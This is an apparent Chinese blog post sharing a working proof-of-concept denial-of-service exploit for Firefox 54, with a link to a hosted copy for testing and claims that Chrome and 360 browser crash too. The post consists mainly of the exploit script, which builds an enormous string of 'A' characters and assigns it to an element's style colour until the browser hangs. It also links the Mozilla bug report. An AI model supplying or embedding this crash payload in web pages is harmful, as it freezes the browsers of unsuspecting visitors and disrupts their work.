最新版火狐远程DoS漏洞,亲测成功​

火狐浏览器Firefox 54.0.1(最新版)远程DoS漏洞
问题出在某些标签的超长样式及颜色属性字符串。
POC如下:

<html>
<body>
<script>
//Windows 7 x64
//FireFox v53.0.3 (32-bit) Crashes
//Credits: John Page / hyp3rlinx
//ISR: ApparitionSec
//hyp3rlinx.altervista.org

var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}        
var el = document.createElement('FORM') //IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA
el.style.color=p2
document.body.appendChild(el)
          
</script>
</body>

</html>

Firefox奔溃就不截图了.........因为卡死了

想直接测试的可点击下面的链接:
https://bug1376692.bmoattachments.org/attachment.cgi?id=8881644

Google Chrome奔溃
360奔溃

相关链接如下
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 2017Web安全工具传说中的神器汇总
    目 录 一、测试地点/场地|Test sites / testing grounds(11条)二、HTTP代理/编...
    流弊的小白阅读 2,237评论 0 6
  • Spring Cloud
    Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,845评论 18 139
  • [译]浏览器如何工作
    1. 介绍 浏览器可能是最广泛使用的软件。本书将介绍浏览器的工作原理。我们将看到,当你在地址栏中输入google....
    康斌阅读 2,046评论 7 18
  • From:黑白之道
    一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,872评论 0 9
  • 诗人徐电:沙哑|老酒庄
    《老酒庄》 文/徐荷骊 他不是柬埔寨人 也不会跳醉人的探戈 他只是一个酒鬼 行尸走肉在 东西南北 在遇到我之前酒是...
    到马路对面去阅读 301评论 0 6